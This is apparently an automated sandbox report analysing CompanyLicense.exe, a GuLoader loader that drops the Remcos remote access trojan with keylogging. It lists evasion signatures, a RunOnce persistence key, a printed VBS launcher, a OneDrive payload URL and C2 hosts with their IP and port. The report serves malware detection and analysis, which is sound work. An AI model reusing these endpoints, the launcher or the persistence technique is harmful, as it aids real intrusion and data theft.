Analysis Report CompanyLicense.exe

Overview

General Information

Sample Name: CompanyLicense.exe
Analysis ID: 341661
MD5: ace3e9fc3a2277aa4e72881c9f204642
SHA1: 50337a4aa52b65cac5fd2745c3fe7d88d503d00f
SHA256: c6cf35735aff0eba459a6a1f4b65722ba08dfb0beed54b0df8e9be3ec3edba98

Detection

Remcos GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: Remcos
Yara detected GuLoader
Yara detected Remcos RAT
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Creates autostart registry keys with suspicious values (likely registry only malware)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • CompanyLicense.exe (PID: 5148 cmdline: 'C:\Users\user\Desktop\CompanyLicense.exe' MD5: ACE3E9FC3A2277AA4E72881C9F204642)
    • CompanyLicense.exe (PID: 6572 cmdline: 'C:\Users\user\Desktop\CompanyLicense.exe' MD5: ACE3E9FC3A2277AA4E72881C9F204642)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
Process Memory Space: CompanyLicense.exe PID: 6572 | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
Process Memory Space: CompanyLicense.exe PID: 6572 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security |
Process Memory Space: CompanyLicense.exe PID: 6572 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
Process Memory Space: CompanyLicense.exe PID: 5148 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Remcos
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\Desktop\CompanyLicense.exe, ProcessId: 6572, TargetFilename: C:\Users\user\AppData\Roaming\remcos\logs.dat

Signature Overview

AV Detection:

Yara detected Remcos RAT
Source: Yara match | File source: Process Memory Space: CompanyLicense.exe PID: 6572, type: MEMORY

Compliance:

Uses 32bit PE files
Source: CompanyLicense.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: global traffic | TCP traffic: 192.168.2.4:49731 -> 185.140.53.253:2048
Source: Joe Sandbox View | IP Address: 185.140.53.253 185.140.53.253
Source: unknown | DNS traffic detected: queries for: onedrive.live.com
Source: CompanyLicense.exe, 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp | String found in binary or memory: https://onedrive.live.com/download?cid=3EA7AF3CF2A8B6E2&resid=3EA7AF3CF2A8B6E2%21118&authkey=AM5VKIx

E-Banking Fraud:

Yara detected Remcos RAT
Source: Yara match | File source: Process Memory Space: CompanyLicense.exe PID: 6572, type: MEMORY

System Summary:

Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A08D5 EnumWindows,NtSetInformationThread
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A8B16 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A474B NtSetInformationThread
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A0D52 NtWriteVirtualMemory,TerminateProcess
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A8E25 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A38A7 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A34CD NtWriteVirtualMemory
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A36D0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A0917 NtSetInformationThread
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A35EF NtWriteVirtualMemory
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A35E2 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 1_2_00568B16 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 1_2_00568EC6 NtSetInformationThread
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 1_2_00569248 NtSetInformationThread
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 1_2_0056910C NtSetInformationThread
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 1_2_00569436 NtSetInformationThread
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 1_2_00568FE0 NtSetInformationThread
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 1_2_005695B9 NtSetInformationThread
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_004041A1
Source: CompanyLicense.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Internering2.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CompanyLicense.exe, 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameSKULPTURUDSTILLING.exe vs CompanyLicense.exe
Source: CompanyLicense.exe, 00000000.00000002.667883059.0000000002090000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs CompanyLicense.exe
Source: CompanyLicense.exe, 00000001.00000000.666580572.0000000000415000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameSKULPTURUDSTILLING.exe vs CompanyLicense.exe
Source: CompanyLicense.exe, 00000001.00000002.1001890961.000000001DEF0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs CompanyLicense.exe
Source: CompanyLicense.exe, 00000001.00000002.1001872713.000000001DDA0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs CompanyLicense.exe
Source: CompanyLicense.exe | Binary or memory string: OriginalFilenameSKULPTURUDSTILLING.exe vs CompanyLicense.exe
Source: CompanyLicense.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: classification engine | Classification label: mal100.troj.evad.winEXE@3/3@74/2
Source: C:\Users\user\Desktop\CompanyLicense.exe | File created: C:\Users\user\AppData\Roaming\remcos
Source: C:\Users\user\Desktop\CompanyLicense.exe | Mutant created: \Sessions\1\BaseNamedObjects\idle-C625D6
Source: C:\Users\user\Desktop\CompanyLicense.exe | File created: C:\Users\user\AppData\Local\Temp\~DF35090EC034E56AF4.TMP
Source: CompanyLicense.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\CompanyLicense.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\CompanyLicense.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\CompanyLicense.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\CompanyLicense.exe | File read: C:\Users\user\Desktop\CompanyLicense.exe
Source: unknown | Process created: C:\Users\user\Desktop\CompanyLicense.exe 'C:\Users\user\Desktop\CompanyLicense.exe'
Source: C:\Users\user\Desktop\CompanyLicense.exe | Process created: C:\Users\user\Desktop\CompanyLicense.exe 'C:\Users\user\Desktop\CompanyLicense.exe'
Source: C:\Users\user\Desktop\CompanyLicense.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Data Obfuscation:

Yara detected GuLoader
Source: Yara match | File source: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CompanyLicense.exe PID: 6572, type: MEMORY
Source: Yara match | File source: Process Memory Space: CompanyLicense.exe PID: 5148, type: MEMORY
Yara detected VB6 Downloader Generic
Source: Yara match | File source: Process Memory Space: CompanyLicense.exe PID: 6572, type: MEMORY
Source: Yara match | File source: Process Memory Space: CompanyLicense.exe PID: 5148, type: MEMORY
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_00405695 push edi; ret 0_2_0040569C
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A5757 push edi; ret 0_2_020A575A
Source: C:\Users\user\Desktop\CompanyLicense.exe | File created: C:\Users\user\AppData\Local\Temp\Arsenation\Internering2.exe

Boot Survival:

Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Users\user\Desktop\CompanyLicense.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Hamid C:\Users\user\AppData\Local\Temp\Arsenation\Internering2.vbs
Source: C:\Users\user\Desktop\CompanyLicense.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Hamid
Source: C:\Users\user\Desktop\CompanyLicense.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A0D52 NtWriteVirtualMemory,TerminateProcess
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A0BD7 TerminateProcess
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\CompanyLicense.exe | RDTSC instruction interceptor: First address: 0000000000562BFB second address: 0000000000562BFB instructions:
Tries to detect Any.run
Source: C:\Users\user\Desktop\CompanyLicense.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\CompanyLicense.exe | File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: CompanyLicense.exe | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\CompanyLicense.exe | RDTSC instruction interceptor: First address: 0000000000562BFB second address: 0000000000562BFB instructions:
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A0D52 rdtsc
Source: C:\Users\user\Desktop\CompanyLicense.exe | Window / User API: threadDelayed 930
Source: C:\Users\user\Desktop\CompanyLicense.exe TID: 6792 | Thread sleep count: 930 > 30
Source: C:\Users\user\Desktop\CompanyLicense.exe TID: 6792 | Thread sleep time: -9300000s >= -30000s
Source: C:\Users\user\Desktop\CompanyLicense.exe | Last function: Thread delayed
Source: CompanyLicense.exe | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Contains functionality to hide a thread from the debugger
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A08D5 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,?,6DDC21B5,6DDB9555,?,321C9581,?,020A8349
Hides threads from debuggers
Source: C:\Users\user\Desktop\CompanyLicense.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\CompanyLicense.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A0D52 rdtsc
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A457E LdrInitializeThunk
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A2C10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A2259 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A2C7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A7679 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A3CAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A833C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 0_2_020A6F42 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 1_2_00566F42 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 1_2_00567679 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 1_2_0056833C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CompanyLicense.exe | Code function: 1_2_00563CAB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CompanyLicense.exe | Process created: C:\Users\user\Desktop\CompanyLicense.exe 'C:\Users\user\Desktop\CompanyLicense.exe'
Source: CompanyLicense.exe, 00000001.00000002.998846227.0000000002527000.00000004.00000040.sdmp | Binary or memory string: Program Manager
Source: CompanyLicense.exe, 00000001.00000002.998765960.0000000000FC0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: CompanyLicense.exe, 00000001.00000002.998765960.0000000000FC0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: logs.dat.1.dr | Binary or memory string: [ Program Manager ]
Source: CompanyLicense.exe, 00000001.00000002.998765960.0000000000FC0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: CompanyLicense.exe, 00000001.00000002.998846227.0000000002527000.00000004.00000040.sdmp | Binary or memory string: Program Managerrgo.org
Source: CompanyLicense.exe, 00000001.00000002.998846227.0000000002527000.00000004.00000040.sdmp | Binary or memory string: Program Manager9

Stealing of Sensitive Information:

Yara detected Remcos RAT
Source: Yara match | File source: Process Memory Space: CompanyLicense.exe PID: 6572, type: MEMORY

Remote Access Functionality:

Yara detected Remcos RAT
Source: Yara match | File source: Process Memory Space: CompanyLicense.exe PID: 6572, type: MEMORY

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation | Registry Run Keys / Startup Folder 11 | Process Injection 12 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 721 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Registry Run Keys / Startup Folder 11 | Virtualization/Sandbox Evasion 22 | LSASS Memory | Virtualization/Sandbox Evasion 22 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 12 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 1 | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 1 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery 31 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label | Link
sheilabeltagy3m.hopto.org | 1% | Virustotal | | Browse

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
sheilabeltagy3m.hopto.org | 185.140.53.253 | true | false | | unknown
northside.hopto.org | 185.140.53.253 | true | false | | unknown
sqknbg.dm.files.1drv.com | unknown | unknown | false | | high
onedrive.live.com | unknown | unknown | false | | high

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://onedrive.live.com/download?cid=3EA7AF3CF2A8B6E2&resid=3EA7AF3CF2A8B6E2%21118&authkey=AM5VKIx | CompanyLicense.exe, 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp | false | | high

Contacted IPs

Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.140.53.253 | unknown | Sweden | | 209623 | DAVID_CRAIGGG | false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 341661
Start date: 19.01.2021
Start time: 17:13:16
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 12s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: CompanyLicense.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@3/3@74/2
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 32.8% (good quality ratio 22.5%)
• Quality average: 43.7%
• Quality standard deviation: 33%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted)
• Excluded domains from analysis (whitelisted)
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
17:14:22 | API Interceptor | 1384x Sleep call for process: CompanyLicense.exe modified

Joe Sandbox View / Context

IPs


Domains

No context

ASN


                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Temp\Arsenation\Internering2.exe
                                    Process:C:\Users\user\Desktop\CompanyLicense.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):98304
                                    Entropy (8bit):5.50764794769054
                                    Encrypted:false
                                    SSDEEP:768:8zNE6BYzwvWXallllllllllllllllllllllllllllllllllllllllllllllllllK:oE66zwuoPMvaB5DqinLdNW2XLnolNI8
                                    MD5:ACE3E9FC3A2277AA4E72881C9F204642
                                    SHA1:50337A4AA52B65CAC5FD2745C3FE7D88D503D00F
                                    SHA-256:C6CF35735AFF0EBA459A6A1F4B65722BA08DFB0BEED54B0DF8E9BE3EC3EDBA98
                                    SHA-512:9220FE497F297AE1D86A13DD28FFFC381A6945AC49CC2F3B904D605A193AF00DAAF18B6BC4F6E85D93F6A80B29D34DD56D7269BBC11B46D98319E571989E721F
                                    Malicious:false
                                    Reputation:low
                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........I...................................Rich............................PE..L......T................. ...`...............0....@.................................%...........................................(....P..p>..................................................................8... ....................................text...p........ .................. ..`.data........0.......0..............@....rsrc...p>...P...@...@..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\Arsenation\Internering2.vbs
                                    Process:C:\Users\user\Desktop\CompanyLicense.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):119
                                    Entropy (8bit):4.835449331887728
                                    Encrypted:false
                                    SSDEEP:3:jfF+m8nhvF3mRDt+kiE2J5xAIKQNNApUiMn:jFqhv9Iwkn23fJNN+Uvn
                                    MD5:3166A889BD35A61A06116E63BED83855
                                    SHA1:55C2B6B33B9B8DCED197373E2627F9679E29B1B9
                                    SHA-256:E107D87C8F8AACC01566C5A56A2A31EAC151D8A9226880D56E140DA33A76C77B
                                    SHA-512:74B3A0E140EB4AC10BF0326D61B16B97D884A7F3C31E48B9BE459D737456B2AA751A665F08D55163D6B940375B0BC1E1A9C292C099582C758328FD4BA53119BF
                                    Malicious:true
                                    Reputation:low
                                    Preview: Set W = CreateObject("WScript.Shell")..Set C = W.Exec ("C:\Users\user\AppData\Local\Temp\Arsenation\Internering2.exe")

                                    C:\Users\user\AppData\Roaming\remcos\logs.dat
                                    Process:C:\Users\user\Desktop\CompanyLicense.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):74
                                    Entropy (8bit):4.662420853767955
                                    Encrypted:false
                                    SSDEEP:3:ttUVXVrA4RXMRPHv31aeo:tmVBXqdHv3IP
                                    MD5:2788D81C1E91ADDC68FED1327ECA7812
                                    SHA1:EEFA17BC4A2DB2D655E9C42D31D51A8C2977BE99
                                    SHA-256:3C96343061BCFDF07B8AC699D4AB70BD04F64D71E3849850DC5BB368CA62583F
                                    SHA-512:271DB10D91EDC0910C80133F570FBEACC0BB51A0000290B1061AE3EA1BB3346CA92ADC5D8C6C35565D431A170BC7B1CDAA95B80A85BFC4D864D2093C887AB73C
                                    Malicious:true
                                    Reputation:low
                                    Preview: ..[2021/01/19 17:14:22 Offline Keylogger Started]....[ Program Manager ]..

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):5.50764794769054
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.15%
                                    • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:CompanyLicense.exe
                                    File size:98304
                                    MD5:ace3e9fc3a2277aa4e72881c9f204642
                                    SHA1:50337a4aa52b65cac5fd2745c3fe7d88d503d00f
                                    SHA256:c6cf35735aff0eba459a6a1f4b65722ba08dfb0beed54b0df8e9be3ec3edba98
                                    SHA512:9220fe497f297ae1d86a13dd28fffc381a6945ac49cc2f3b904d605a193af00daaf18b6bc4f6e85d93f6a80b29d34dd56d7269bbc11b46d98319e571989e721f
                                    SSDEEP:768:8zNE6BYzwvWXallllllllllllllllllllllllllllllllllllllllllllllllllK:oE66zwuoPMvaB5DqinLdNW2XLnolNI8
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........I....................................Rich............................PE..L......T................. ...`...............0....@

                                    File Icon

                                    Icon Hash:0919914f4707077b

                                    Static PE Info

                                    General

                                    Entrypoint:0x401480
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                    DLL Characteristics:
                                    Time Stamp:0x54CDDCDF [Sun Feb 1 07:59:27 2015 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:cdaaae34b462dd94bb47458bdb1adef4

                                    Entrypoint Preview

                                    Instruction
                                    push 004028A8h
                                    call 00007F8E00E97DE3h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    xor byte ptr [eax], al
                                    add byte ptr [eax], al
                                    inc eax
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [edx-13h], dl
                                    xchg eax, ebx
                                    inc edi
                                    ror byte ptr [esi-27h], 1
                                    inc ebx
                                    xchg eax, ecx

                                    Data Directories

                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x11dd4 | 0x28 | .text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x15000 | 0x3e70 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x238 | 0x20 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x118 | .text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                    Sections

                                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x1000 | 0x11270 | 0x12000 | False | 0.344957139757 | data | 5.50911753026 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .data | 0x13000 | 0x1598 | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                    .rsrc | 0x15000 | 0x3e70 | 0x4000 | False | 0.405883789062 | data | 5.82018702814 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                    Resources

                                    Name | RVA | Size | Type | Language | Country
                                    RT_ICON | 0x15148 | 0x468 | GLS_BINARY_LSB_FIRST | |
                                    RT_ICON | 0x155b0 | 0x10a8 | data | |
                                    RT_ICON | 0x16658 | 0x25a8 | data | |
                                    RT_GROUP_ICON | 0x18c00 | 0x30 | data | |
                                    RT_VERSION | 0x18c30 | 0x240 | data | English | United States

                                    Imports

                                    DLL | Import
                                    MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaI2Str, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarDup, _CIatan, __vbaStrMove, __vbaAryCopy, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                    Version Infos

                                    Description | Data
                                    Translation | 0x0409 0x04b0
                                    InternalName | SKULPTURUDSTILLING
                                    FileVersion | 1.00
                                    CompanyName | Above
                                    ProductName | Hypotrochoid9
                                    ProductVersion | 1.00
                                    OriginalFilename | SKULPTURUDSTILLING.exe

                                    Possible Origin

                                    Language of compilation system | Country where language is spoken
                                    English | United States

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

